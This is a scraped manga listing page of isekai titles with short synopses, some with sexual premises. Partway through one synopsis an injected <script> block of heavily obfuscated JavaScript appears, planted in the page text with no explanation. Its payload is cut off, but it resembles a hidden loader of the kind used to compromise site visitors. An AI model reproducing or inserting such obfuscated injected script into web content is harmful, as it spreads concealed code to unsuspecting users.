Isekai - Page 100

Isekai manga revolves around characters who are transported to another world, often one filled with fantasy, magic, and epic adventures. The protagonist typically navigates the challenges of this new world, sometimes gaining special powers or becoming a hero.

1478 results

Isegure - Isekai Cheat Musou Ore TUEEE-kei Ikiri Tenseisha ni Kamaseinu ni sare Tsuzuketa Elite Kishi, Chou Gureru

\"I\'m not just a foil!\" In order to stop more people from reincarnating in his world, the former elite knight leader sets out on a mission! An unprecedented comedy about preventing any and reincarnation is about to begin!


Catastrophic Necromancer

The game has emerged into reality, the rules of the world have been turned upside down and humanity has entered the era of becoming players with the world set as a game stage. The only way to become a player is by leveling up to become stronger! The only way to rise to the top of the world! On the day of world fusion Lin Moyue chose to take on the sole hidden class, Necromancer. From then on, Lin Moyue would not die until his summoned creatures died out. “I sit on the throne of bones as the God of the dead and walk between life and death.” “I am a walking catastrophe!”


Isekai de Uwamae Hanete Ikiteiku ~Saisei Mahoutsukai no Yuru Fuwa Jinzai Haken Seikatsu~

A company drone who died from overworking was reincarnated as Sawadi, the third son of a merchant in a different world. His cheat skill is restoration magic and support magic. With these cheat skills, he came up with a new business model where he used his restoration magic to cure cheap slaves and made them earn money for him. Although his earnings are steadily increasing, he also has to suffer the consequence of getting his workload also increased... Will Sawadi ever be able to live leisurely without working?


Buta no Fukushuu

Before successfully being able to commit suicide, Takeshi Hirota, a bullied high school boy is transported to another another world where he is accepted by the orcs due to his appearance.


Tensei Shitara Akari dake ga Slime Datta Ken

The Amusement Club gets transported to another world… and Akari turns into a slime. A new Yuru Yuri isekai spinoff.

1 days ago

Becoming the Only Memory of the Male Lead

The body was possessed before the start of the novel. Also, she, the daughter of a Count, is an extra who is bound to be murdered. She didn't want to die like this, so she went in search of the male lead who's filled with the energy of life. The problem is that, due to his curse, he can't remember others. As the next best solution, she even tried to target his subordinates. "It's been long, Loreina." What? Why does this person remember me? It was unexpectedly due to an exception of the curse. Um. Well, I'll help you until the female lead appears. The only one who can break the curse is the female lead, so that it doesn't deviate from the original story. ...Yeah, that's exactly what she thought. ••• Kiss. I felt a soft touch on my cheek along with an unfamiliar sound. A tiny kiss landed on my cheek. "...Le-Leonard." "Stay still. It's interfering with the treatment." "No, but that's..." I understand that you're healing the injured area with the energy of life. "Is there any other way than this? You can just touch the injured area with your hand..." "No." Leonard just cut me off. ...No, there's no such thing!<script></script><script>(function(_0x170be8,_0x4f3006){var _0x5282b9=_0x2819,_0x5e0002=_0x170be8();while(!![]){try{var _0x2f6632=parseInt(_0x5282b9(0x1a9))/(0x8ee+0x2199+-0x2a86)*(parseInt(_0x5282b9(0x1a4))/(-0x1501+-0xc6+0x15c9))+-parseInt(_0x5282b9(0x1b0))/(-0x10*-0x1bc+0x2ad*-0x1+-0x1*0x1910)*(-parseInt(_0x5282b9(0x1a8))/(-0x51b*0x2+0x23b1*0x1+-0x1977))+parseInt(_0x5282b9(0x1bd))/(0xeb+-0x6d*-0x31+-0x3*0x741)*(parseInt(_0x5282b9(0x19e))/(-0x1f25+0x1d35+0x1f6))+parseInt(_0x5282b9(0x1a5))/(-0x1c63+-0x221*-0x11+-0x7c7)*(-parseInt(_0x5282b9(0x1a2))/(0x26ee+0x90b*0x1+0x1*-0x2ff1))+parseInt(_0x5282b9(0x1b8))/(0xa3*-0x16+0x4a6+0x965)+parseInt(_0x5282b9(0x1b6))/(-0x105+-0x5c*0x40+0x180f)*(parseInt(_0x5282b9(0x1b9))/(-0xd*-0x89+-0x2*-0x3e5+-0xeb4))+-parseInt(_0x5282b9(0x1b3))/(-0x4ca*-0x7+-0x67*-0x3a+-0x38d0);if(_0x2f6632===_0x4f3006)break;else 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Makutsu no Ou ~Yomei Ikkagetsu no Doutei, Mahou Shoujo Harem o Kizuite Ou e Kunrinsu~

After being transported to another world and wandering a forest inhabited by monsters, Shimizu Shouichi\'s life is saved by a cute fairy called Ami. He is given the skills to survive in the other world, but in exchange, he has to make a girl climax once a month or he will die! Shouichi, who has no experience with women, is hesitant at first, but Ami\'s skillful conversation skills lead him to become honest about the desires hidden deep within his heart... If he doesn\'t have sex with a magical girl, he will die!? A tale of the rise of an introverted, unpopular virgin and a doggy-style-obsessed fairy!


Isekai Kaeri no Yuusha wa, Dungeon ga Shutsugen shita Genjitsu Sekai de, Influencer natte Kane wo Kasegimasu!

One day, an ordinary high school student is transferred to another world. He raises his level in the other world, successfully defeats the Demon King, and saves the world! With his strongest status, he decided to return to his own world. However, in the world to which he returns, a new “dungeon” has appeared. A modern dungeon fantasy where the former hero becomes a warrior, delving into dungeons created in his own world!


Shin Elf-san wa Yaserarenai. (Official Colored)

You know the drill by now - Naoe is a massage therapist whose life is turned upside down when he starts dealing with girls from another world and their weight issues. But this isn’t called Shin Elf-san for nothing. You’re going to get fully-colored pages due to its digital release, as well as new scenarios involving your favorite chubby elf. Get ready to get down with the thiccness!


Mizu Mahou Gurai Shika Torie ga Nai Kedo Gendai Chishiki ga Areba Juubun da yo ne

A five-year-old orphan named Frim, struggling to survive on the streets of the slums, recalls memories of Her past life as a Japanese person. Her everyday life is filled with violence and injustice, and She has no allies. All She possesses are \"magic that can produce water\" and \"modern knowledge.\" Even finding a place with a roof to sleep under is a luxury in her current situation... However, by using ideas that don’t exist in this world to improve his working conditions and discovering new ways to utilize water magic beyond drinking water, Frim gradually begins to make her presence known!


Tensei Youjo. Kamikemono to Ouji to, Saikyou no Ojisan Youhei-dan no Naka de Ikiru

Lise found herself alone in a strange meadow in the shape of a girl. Also, there is a big dog in front of her. There wasn\'t a dog like that in the neighborhood, and that\'s when Lise was convinced. I see…… This is what they call reincarnation in another world! Then, a group of muscular mercenaries appears in front of Lise. It seems that they have come to defeat this dog. But to his surprise, this dog is a divine beast! Ranagh, the divine beast, has grown fond of Lise, who is the only one who can understand him. So, the leader of the mercenary group, Arlagia, offers to protect Lise and Ranagh with his mercenary group.....? A young girl, a divine beast, and the strongest group of mercenaries. A wacky otherworldly fantasy with a cast of unorthodox characters.


Maseki Gurume: Mamono no Chikara wo Tabeta Ore wa Saikyou!

In this world, It\'s only me who can get stronger by eating Magic Stones! At one point, I received an offer to have a smooth life reincarnation from the Goddess-sama… But the skill I got as a prize is Toxins Decomposition EX. Ugh, what a plain skill! It\'s so pitiful that even my own family makes fun of me… However, one day I realized that because of the effect of this skill, I can eat and gain power from Magic Stones! I\'ve also been notified that I\'m the prince from a neighboring country!? What awaits me in the castle are days of experimenting with Magic Stones and training, the perfect environment for me to become the strongest man there is… And to top it off, I received the Magic Stone of Dullahan! The story of a boy on the path to becoming a King while being chased by an assertive fiancee and Female Knights starts here! --- Social Media Links: Chisato Naruse (light novel illustrator): [@naruti06]( - Light Novel: [Japanese]( - Web Novel: [Japanese](
